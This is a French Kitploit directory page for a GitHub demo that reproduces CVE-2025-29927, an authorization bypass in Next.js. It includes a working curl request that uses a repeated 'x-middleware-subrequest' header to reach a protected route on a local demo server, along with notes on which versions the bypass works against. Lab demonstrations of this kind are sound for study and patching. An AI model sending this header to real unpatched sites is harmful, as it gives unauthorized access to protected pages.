Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-29927-demo — Next.js における認可バイパスの脆弱性 CVE-2025-29927 を再現するデモです。 | Kitploit
Outils/GitHubGitHub/t3tra-dev/cve-2025-29927-demo
Authentication & AuthorizationVulnerability AnalysisWeb Application ExploitationLearning & EducationLabs & Practice
GitHubt3tra-dev/cve-2025-29927-demo

cve-2025-29927-demo

Next.js における認可バイパスの脆弱性 CVE-2025-29927 を再現するデモです。

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-2025-29927-demo

Démo reproduisant la vulnérabilité de contournement d'autorisation dans Next.js.

Pour plus de détails sur cette vulnérabilité, veuillez consulter Résumé de la vulnérabilité CVE-2025-29927 de Next.js.

Méthode de reproduction de la vulnérabilité

  1. Clonez ce dépôt.
root@kitploit:~
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
  1. Démarrez le serveur.
root@kitploit:~
npm install
npm run dev
  1. Envoyez une requête avec l'en-tête x-middleware-subrequest en utilisant curl ou similaire.
root@kitploit:~
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected

Cela déclenche un contournement d'autorisation et permet d'accéder à la page /protected.

La valeur middleware est le nom du middleware reconnu par Next.js. Dans cette application de démo, un middleware nommé middleware existe, donc en spécifiant cette valeur, le contournement d'autorisation se produit.

[!TIP] Dans Next.js 15.x, MAX_RECURSION_DEPTH est défini sur 5, donc il est nécessaire de répéter la valeur de middleware au moins 5 fois séparées par :. Dans les versions plus anciennes (14.x), simplement « middleware » suffisait. Cette application de démo utilise Next.js 15.2.2, donc une telle valeur est nécessaire.

Télécharger l’outil